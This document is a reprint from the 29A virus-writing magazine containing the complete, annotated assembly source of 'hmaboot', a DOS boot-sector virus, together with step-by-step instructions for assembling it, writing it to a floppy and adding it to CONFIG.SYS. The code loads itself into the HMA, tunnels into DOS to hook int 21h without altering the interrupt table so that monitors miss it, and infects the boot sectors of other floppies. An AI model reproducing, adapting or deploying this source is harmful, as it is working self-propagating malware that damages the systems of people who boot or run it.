
29A Issue 02 04 08

Published in 
29A
 · 4 years ago

  

comment *

Designed by "Q" the Misanthrope

This virus uses HMA memory extensively. It boots directly into the HMA by the
brute force method. It then waits until DOS has loaded, creates a randomly named
file and adds an Install= statement to CONFIG.SYS that loads the virus into the
HMA again (not bad for 512 bytes). Also works with Windoze 95.

tasm hmaboot /m2
tlink hmaboot
exe2bin hmaboot.exe hmaboot.com
format a:/q/u
debug hmaboot.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 11e,2ff 100
w
q
copy hmaboot.com c:\BBFNJACD
edit c:\config.sys
Install=\BBFNJACD
altf
x
y

*

.286 ;286 forms (pusha/popa, push imm8) are used throughout

qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg

; Offsets 0000h-001dh are laid out as a floppy boot sector: a short jump
; into hma_install, a nop, the OEM name and a BIOS parameter block for a
; 1.44 MB disk.  At boot the whole sector sits at 0000:7c00h, which is why
; the code below adds 7c00h (first HMA copy) or 7e00h-02h (second HMA
; copy) to its own offsets.  set_cx_dx reads the BPB fields back from
; [bx+11h], [bx+16h] and [bx+18h].
top: jmp short hma_install ;these two bytes are also the "already infected" marker resident_21 compares against
db 90h
db "MSDOS5.0" ;OEM name
dw 512 ;bytes per sector
db 1 ;sectors per cluster
dw 1 ;reserved sectors
db 2 ;number of FATs
dw 224 ;root directory entries (offset 11h)
dw 2880 ;total sectors
db 0F0h ;media descriptor
dw 9 ;sectors per FAT (offset 16h)
dw 18 ;sectors per track (offset 18h)
dw 2 ;heads

org 001eh ;com_install follows the BPB; the build notes above copy the image from this offset to make the .COM

;-----------------------------------------------------------------------
; com_install - entry point of the .COM form (the file that the Install=
; line added to CONFIG.SYS by interrupt_21 loads).  Installs interrupt_1
; as the single-step handler, builds an IRET frame that returns to
; cs:0000h (the PSP, whose first bytes terminate the program), raises
; int 1 so that interrupt_1 turns the trap flag on, and then jumps
; through the int 21h vector; the whole int 21h chain is thereby traced
; instruction by instruction by interrupt_1.
; Assumes the .COM convention cs=ds=PSP segment.
; NOTE(review): nothing in this file restores the int 1 vector saved in
; ds:dx; it is left pointing into the terminated program's memory.
;-----------------------------------------------------------------------
com_install proc near
mov ax,3501h ;int 21h/35h: es:bx = current int 1 vector
int 21h
mov dx,offset interrupt_1-com_install+100h ;interrupt_1 as a .COM-relative offset (image starts at 100h)
mov ah,25h ;int 21h/25h: int 1 = ds:dx = interrupt_1
push es
int 21h
pop ds ;ds:dx = saved int 1 vector, as ah=25h would need it to put it back
push 00h ;es=00h (IVT segment)
pop es
pushf ;start of a fake IRET frame: flags
mov dx,bx
push cs ;cs
push es ;ip = 0000h: iret lands on cs:0000h, which terminates the program
int 01h ;interrupt_1 recognises this call site (push 00h ten bytes before the jmp) and sets TF
jmp dword ptr es:[21h*04h] ;same effect as int 21h, but now single-stepped by interrupt_1
com_install endp

;-----------------------------------------------------------------------
; hma_install - boot-sector entry point (reached from the jump at top).
; Assumes the BIOS entered at 0000:7c00h with cs=0.  Steps:
;   1. enable the A20 line through the 8042 output port so the HMA is
;      addressable; the bytes up to make_hma are reused as a stub later;
;   2. copy the 510-byte sector twice into the HMA, to fc0e:7c00h and
;      fc0e:7dfeh (addressed as X+7c00h and X+7e00h-02h elsewhere);
;   3. hook int 1ah: the old vector is saved in the second copy's
;      previous_hook, then the vector is pointed at a stub at 0000:0201h
;      (inside the IVT area) that re-enables A20 and far-jumps to
;      interrupt_1a in the second HMA copy;
;   4. fall through into set_cx_dx, which reloads the original boot
;      sector to 0000:7c00h and returns to it via the cs:bx pushed below.
; Execution moves into the HMA at the first call hook_interrupt: its retf
; pops the pushed es (fc0eh) as the return segment.
; Observable trace: int 1ah vector = 0000:0201h until interrupt_1a
; restores it.
;-----------------------------------------------------------------------
hma_install proc near ;brute force HMA access @ boot
pusha
mov al,0d1h ;8042 command d1h: write output port
out 64h,al
reloop: in al,64h ;wait until the 8042 input buffer is empty (status bit 1)
and al,02h
jnz reloop
mov al,0e3h ;output port value with the A20 gate bit set
out 60h,al
popa
es_si equ $+01h ;address of the 7c00h immediate below; the two bytes after it
;(push cs = 0eh, cld = 0fch) read as the word fc0eh, giving es:si = fc0e:7c00
make_hma: mov bx,7c00h ;for reading boot sector
push cs ;becomes fc0eh for es
cld
pop ds ;ds = cs = 0
les si,dword ptr ds:[bx+offset es_si-top] ;es:si = fc0e:7c00h, the HMA destination
mov cx,offset previous_hook ;loop counter: 1feh = 510 bytes
lea di,word ptr ds:[si] ;di = 7c00h: source is 0000:7c00
push cs ;cs:bx = 0000:7c00h stays on the stack for set_cx_dx's retf
push bx
push si
rep movsb ;first copy: 0000:7c00 -> fc0e:7c00
pop si ;si = 7c00h again; di has advanced to 7dfeh
mov cl,low((offset previous_hook-top)/2) ;cx = 0ffh words (cx is 0 after rep)
rep movsw ;second copy: fc0e:7dfe, hence the +7e00h-02h addressing
mov si,1ah*04h ;hook interrupt 1ah: ds:si = IVT slot
push si
push es ;return segment for hook_interrupt's retf: continue in the HMA copy
mov ax,offset interrupt_1a+7e00h-02h ;interrupt_1a in the second copy
call hook_interrupt ;es:di is now the second copy's previous_hook: old int 1ah saved there, int 1ah = es:ax
mov es,cx ;es=0 (cx is 0 after rep movsw)
mov cl,low(offset make_hma-hma_install) ;length of the A20 stub (pusha .. popa)
mov di,0201h ;stub destination 0000:0201h; also ax=0201h for the int 13 read in set_cx_dx
push di
mov si,offset hma_install+7c00h ;ds is still 0: read the stub from the sector at 0:7c00
rep movsb ;HMA enable stub to low mem
mov al,0eah ;far jump opcode appended to the stub
stosb
pop ax ;ax=0201 for int 13 read
pop si ;si = 1ah*4: repoint int 1a at the stub
push cs ;for far call return
call hook_interrupt ;copies the current int 1ah vector (fc0e:interrupt_1a) after the 0eah, then int 1ah = 0000:0201h
hma_install endp

;-----------------------------------------------------------------------
; set_cx_dx - compute the CHS address of the last sector of the root
; directory from the BPB at ds:[bx] and run the int 13h already in ax
; against it (0201h read when entered from hma_install, 0301h write from
; resident_21).  The original boot sector is parked in that sector.
;   cx = root entries/16 + 2*sectors per FAT + 1 - sectors per track
;   dh = 1
; i.e. C0/H1/S15 for the 1.44 MB geometry; the arithmetic assumes two
; FATs, a single reserved sector and a root directory that ends on head 1
; of cylinder 0.  Ends with retf, so callers push the return segment:
; hma_install left 0000:7c00h on the stack and so returns straight into
; the freshly read original sector.
;-----------------------------------------------------------------------
set_cx_dx proc near ;read original bootsector
mov si,word ptr ds:[bx+11h] ;root directory entries
shr si,04h ;/16 = root directory sectors (32-byte entries, 512-byte sectors)
mov cx,word ptr ds:[bx+16h] ;sectors per FAT
shl cx,01h ;two FATs
add cx,si
mov dh,01h ;head 1
inc cx ;+1 for the reserved boot sector; ch stays 0 = cylinder 0
sub cx,word ptr ds:[bx+18h] ;minus sectors per track = sector number on head 1
int 13h ;read it and then jump to it
retf
set_cx_dx endp

; Strings used by interrupt_21.  int 21h/5ah appends the name it generates
; to the "\" in file_name, so the line appended to CONFIG.SYS reads
; "Install=\<8-character name>" followed by the CR/LF that interrupt_21
; stores at crlf (file_name+09h).  Both the line and a 512-byte file with
; that name in the root directory are visible on an infected system.
config_line db "C:\Config.Sys",00 ;what to infect
install_name db "Install=" ;what to add
file_name db "\",00h ;random file goes here
crlf equ $+07h ;a carriage return line feed, stored after the generated name

;-----------------------------------------------------------------------
; interrupt_1 - single-step (trap flag) handler installed by com_install.
; Each traced instruction is inspected: when it is a far indirect jump
; through a memory pointer (FF 2E disp16 after a one-byte prefix) whose
; target segment byte is f0h or higher, the int 21h chain has reached DOS
; in the HMA.  The virus then requests HMA space (int 2fh/4a02h), copies
; its .COM image there and redirects that dispatch pointer to resident_21;
; the int 21h entry in the IVT itself is not modified, so a monitor that
; only compares IVT entries does not see the hook.
; The trap flag is toggled on when the trace starts from com_install
; (recognised by the push 00h ten bytes before its jmp) and off again once
; the hook is in place or no HMA was granted.
; Frame after pusha/push sp/pop bp: [bp+10h]=ip, [bp+12h]=cs,
; [bp+14h]=flags of the interrupted code; TF is bit 0 of [bp+15h].
;-----------------------------------------------------------------------
interrupt_1 proc near ;tunnel routine to hook int 21
pusha
push sp ;286+: push sp stores the value before the push, so bp = top of the pusha frame
pop bp
push ds
push es
lds bx,dword ptr ss:[bp+10h];ds:bx = cs:ip of the instruction about to execute
cmp word ptr ds:[bx+01h],02effh ;bytes FF 2E at bx+1: jmp dword ptr seg:[disp16]
jne go_back ;was it a far indexed jump
cmp byte ptr ds:[bx-0ah],6ah ;push 00h in com_install sits 0ah bytes before its jmp
je toggle_tf ;was it our code: start tracing
mov si,word ptr ds:[bx+03h] ;disp16 of the pointer the jump goes through
cmp byte ptr ds:[si+03h],0f0h ;high byte of the target segment (read relative to the interrupted cs)
jb go_back ;was it in the HMA
mov bh,high(((tail-com_install+10h)SHR 4)*10h)+01h ;bx = bytes of HMA requested, enough up to tail; bl keeps the low byte of ip
mov di,0ffffh ;if so then allocate HMA: di stays ffffh when the request fails
mov ax,4a02h ;int 2fh/4a02h: es:di = HMA block
int 2fh
inc di ;di=0 if no HMA (otherwise the copy below starts one byte into the block)
jz toggle_tf
push si ;save location of int 21 chain
cld
mov cx,previous_hook-com_install ;1e0h bytes: com_install .. previous_hook
mov si,0100h ;copy virus to HMA from the .COM image at cs:0100h
rep movs byte ptr es:[di],cs:[si]
pop si ;hook into int 21 chain
lea ax,word ptr ds:[di-(offset previous_hook-resident_21)] ;di now equals the HMA copy's previous_hook; ax = HMA resident_21
push cs ;for far call
call hook_interrupt ;old dispatch pointer saved at es:di, ds:[si] = es:ax
toggle_tf: xor byte ptr ss:[bp+15h],01h;toggle single step flag
go_back: pop es
pop ds
popa ;pop all variables
iret ;return
interrupt_1 endp

;-----------------------------------------------------------------------
; hook_interrupt - splice into a far pointer.
; In:  ds:si = the far pointer to take over (an IVT slot or a kernel
;              dispatch pointer); es:di = where its old value is saved;
;      es:ax = new handler (es is both the save segment and the new
;              handler's segment)
; Out: es:[di] = old pointer, si and di advanced by 4; ds:[si-4] = es:ax
; Returns with retf, so every caller pushes the return segment first
; (push cs or push es).  movsw follows DF; callers clear it beforehand.
;-----------------------------------------------------------------------
hook_interrupt proc near ;hook interrupt
movsw ;move ds:si to es:di
movsw ;4 bytes worth
mov word ptr ds:[si-04h],ax ;hook into ds:si es:ax
mov word ptr ds:[si-02h],es
retf ;return far
hook_interrupt endp

;-----------------------------------------------------------------------
; interrupt_21 - one-shot int 21h hook (first HMA copy), installed by
; interrupt_1a once DOS reports itself loaded.  On the first int 21h call
; it edits C:\CONFIG.SYS: opens it, reads the file time (0000h = already
; done), creates a file via int 21h/5ah in the root directory of the
; current drive, writes the 512-byte .COM image (starting at com_install)
; into it, appends "Install=\<name>" + CR/LF to CONFIG.SYS, sets the file
; time to 0000h as the marker and closes.  Finally it restores the saved
; int 21h vector and chains to it.  If the open fails it chains without
; unhooking and retries on the next int 21h call.
; DOS is reached through int 18h, which interrupt_1a pointed at the
; original int 21h handler, so these calls do not re-enter this hook.
; The file writes come from a conventional-memory copy of the image
; (int 21h/48h) rather than from the HMA.
; Entered with cs = fc0eh; ds is set to cs before the first DOS call.
; Registers are preserved (pushf/pusha/push ds/push es, undone at pop_it).
;-----------------------------------------------------------------------
interrupt_21 proc near ;momentary int 21 routine
pushf
pusha
push ds
push es
push cs
pop ds
mov ax,3d42h ;open config.sys: al=42h read/write, share deny none
mov dx,offset config_line+7e00h-02h ;path string in the second HMA copy
int 18h ;= original int 21h; ax = handle, CF on error
mov bx,5700h ;get date
xchg ax,bx ;ax=5700h, bx=handle; xchg does not touch CF
jc retry_later ;jump if error: chain now, try again on the next call
int 18h ;cx=time, dx=date
jcxz close_it ;check if infected: time 0000h is the marker set below
inc ax ;ax=5701h for set date later
pusha ;save it
mov ah,48h ;allocate lower memory for
mov bx,0888h ;disk write to config.sys
mov cx,bx ;cx = 0888h words for the copy below
int 18h
jc popa_close_it
mov es,ax ;new segment to copy virii to
mov dx,offset file_name+7e00h-02h
mov di,dx ;ds:dx points to virii name
lea si,word ptr ds:[di]
std ;copy downwards from file_name: both HMA copies keep their offsets in the new segment
rep movsw ;move the virus to low mem
push es
pop ds ;ds = conventional-memory copy
mov ah,5ah ;create random file: the generated name is appended after the "\" at ds:dx; cx=0 = attributes
int 18h
mov dx,offset com_install+7c00h ;.COM image starts at com_install in the first copy
mov bh,40h ;now write it: ah=40h after the xchg, bx=handle
xchg ax,bx
mov ch,02h ;cx=0200h: 512 bytes (cl is 0 after rep movsw)
int 18h
mov ah,3eh ;close it
int 18h
popa ;ax=5701h, bx=config.sys handle, cx=time, dx=date
pusha ;push it again
mov ax,4202h ;goto the end of config.sys
cwd ;dx=0, copied to cx: offset 0 from end
push dx
pop cx
int 18h
mov ah,40h ;write install= line and crlf
mov word ptr ds:[crlf+7e00h-02h],0a0dh ;CR LF right after the generated name
mov cl,low(crlf-install_name+02h) ;"Install=" + "\name" + CR LF = 13h bytes
mov dx,offset install_name+7e00h-02h
int 18h ;add line to config.sys
mov ah,49h ;deallocate memory (es = block from 48h)
int 18h
popa_close_it: popa ;get file date
sub cx,cx ;mark that it is infected: time 0000h
int 18h ;ax=5701h set date/time
close_it: mov ah,3eh ;close config.sys
int 18h
set_21_back: lds dx,dword ptr ds:[previous_hook+7c00h] ;saved int 21h vector; same offset in the HMA and low-memory copies
jmp short set_int_21 ;unhook int 21
retry_later: jmp short jmp_pop_it
interrupt_21 endp

;-----------------------------------------------------------------------
; interrupt_1a - int 1ah hook, reached from the A20 stub at 0000:0201h
; and running in the second HMA copy.  On every call it asks
; int 2fh/1200h whether DOS is installed (al=ffh) and just chains until
; it is.  Once DOS is up it edits the IVT (ds=0):
;   - restores int 1ah from the vector saved in its own previous_hook,
;   - copies the current int 21h vector into the int 18h slot, giving the
;     virus a private path to DOS while int 21h is hooked,
;   - saves the int 21h vector in the first copy's previous_hook,
;   - sets int 21h (through int 18h) to interrupt_21 in the first copy.
; Then chains to the original int 1ah via pop_it/far_jmp.
; Observable trace: the int 18h vector pointing at the DOS int 21h entry.
;-----------------------------------------------------------------------
interrupt_1a proc near ;interrupt 1a hook at startup
pushf
pusha
mov ax,1200h ;dos loaded yet?
push ds
push es
cwd ;dx=0 for the ds load below
int 2fh
inc al ;al=ffh (installed) becomes 0
jnz jmp_pop_it
mov ds,dx ;if so then unhook int 1a and
mov si,21h*04h ;hook int 21 and set int 18
mov di,offset previous_hook+7c00h ;first copy's previous_hook receives the old int 21h vector
les bx,dword ptr cs:[previous_hook+7e00h-02h] ;old int 1ah, saved here by hma_install
mov ds:[si-((21h-1ah)*04h)],bx ;0000:0068h = int 1ah vector restored
mov ds:[si-((21h-1ah)*04h)+02h],es
les bx,dword ptr ds:[si] ;current int 21h vector
mov ds:[si-((21h-18h)*04h)+02h],es ;0000:0060h = int 18h vector: alias for the DOS entry
mov ds:[si-((21h-18h)*04h)],bx
push cs
cld
pop es
movsw
movsw ;hook in int 21: vector saved at cs:previous_hook+7c00h
mov dx,offset interrupt_21+7c00h
push cs
pop ds
set_int_21: mov ax,2521h ;set int 21 (also the tail of interrupt_21's unhook path)
int 18h ;through the original DOS entry
jmp_pop_it: jmp short pop_it
interrupt_1a endp

org 001aeh ;resident_21 is pinned here; it must end before far_jmp at 1fdh

;-----------------------------------------------------------------------
; resident_21 - the permanent int 21h hook, living in the HMA block that
; interrupt_1 allocated and reached through the dispatch pointer it
; redirected (not through the IVT).  Infects the boot sector of A: when a
; program asks for the country code (ah=38h) while A: is the current
; drive:
;   1. int 13h reads C0/H0/S1 of drive 0 into vbuffer (located with the
;      call/pop trick, since the HMA offset of this copy is not fixed);
;   2. the first word of that sector is compared with this code's own
;      "jmp short hma_install" (rebuilt in di by the overlapping org);
;      a match means already infected;
;   3. otherwise the original sector is written to the last root-directory
;      sector (set_cx_dx), the short jump is patched in, the body from
;      com_install to previous_hook is copied in after the floppy's own
;      BPB, and the sector is written back.
; Every other call, and any int 13h error, falls through pop_it to
; far_jmp, which chains to the saved DOS entry.  pop_it is shared with
; interrupt_21 and interrupt_1a.
;-----------------------------------------------------------------------
resident_21 proc near ;resident int 21 routine
pushf
pusha
push ds
push es
cmp ah,38h ;infect on get country code
jne pop_it
mov ah,19h ;see if drive a:
pushf
push cs
call far_jmp ;simulate an int 21h into the original handler; its iret returns here
or al,al ;al = current drive, 0 = A:
jnz pop_it ;if not then don't infect
call next_line ;get offset in HMA
next_line: pop bx ;bx = offset of next_line in this copy
add bx,offset vbuffer-next_line ;bx = this copy's vbuffer
push cs
mov cx,0001h ;read boot sector: cylinder 0, sector 1
pop es
push cs
mov ax,0201h ;read one sector
cwd ;dx=0: drive 0 (A:), head 0
pop ds
int 13h ;es:bx = cs:vbuffer
jc pop_it ;any errors then leave
mov di,0000h ;move di the jmp instruction
org $-02h ;at the start of the virii: the jmp below overwrites the 0000h immediate,
jmp $(hma_install-top) ;intended to assemble to the same bytes as the jump at top, so di = that word
cmp di,word ptr ds:[bx] ;check if it is infected
je pop_it ;if so then leave
mov ax,0301h ;move old boot sector
pusha ;keeps ax=0301h, cx=1, dx=0, bx=vbuffer for the final write
push cs ;for far call
call set_cx_dx ;write old boot sector to the last root-directory sector, per the floppy's BPB in vbuffer
xchg di,word ptr ds:[bx] ;put jmp in boot sector
cld ;copy virii to boot sector
mov cx,previous_hook-com_install ;1e0h bytes
lea si,word ptr ds:[bx-offset (vbuffer-com_install)] ;this copy's com_install
lea di,word ptr ds:[bx+com_install-top] ;vbuffer+1eh: after the floppy's BPB, which is kept
rep movsb
popa ;write virus
int 13h
pop_it: pop es ;clean the stack
pop ds
popa
popf
resident_21 endp

org 001fdh ;far_jmp at 1fdh: the 4-byte pointer after the 0eah opcode then spans 1feh-201h

;-----------------------------------------------------------------------
; far_jmp - "jmp far [previous_hook]": a 0eah opcode followed by the
; 4-byte pointer stored at previous_hook.  The pointer holds whichever
; vector that copy of the code saved: the old int 1ah in the second HMA
; copy, the old int 21h in the first copy, the old DOS dispatch pointer
; in the block set up by interrupt_1.  On disk these bytes are the 0aa55h
; boot signature plus the two bytes after the sector, so the jump is only
; valid after hook_interrupt has written the pointer.
;-----------------------------------------------------------------------
far_jmp proc near
db 0eah ;jump to previous hook
previous_hook: label double ;no bytes emitted: overlays boot_signature and the two bytes at 200h
far_jmp endp

boot_signature dw 0aa55h ;boot sector thingy: also the initial low word of previous_hook

org $+02h ;high word of previous_hook (200h-201h), not assembled
vbuffer label byte ;where the reads/writes are: sector buffer at 202h, beyond the 512-byte sector, so memory only
org $+0202h
tail label byte ;the end (404h): interrupt_1 sizes its HMA request up to here

qseg ends
end
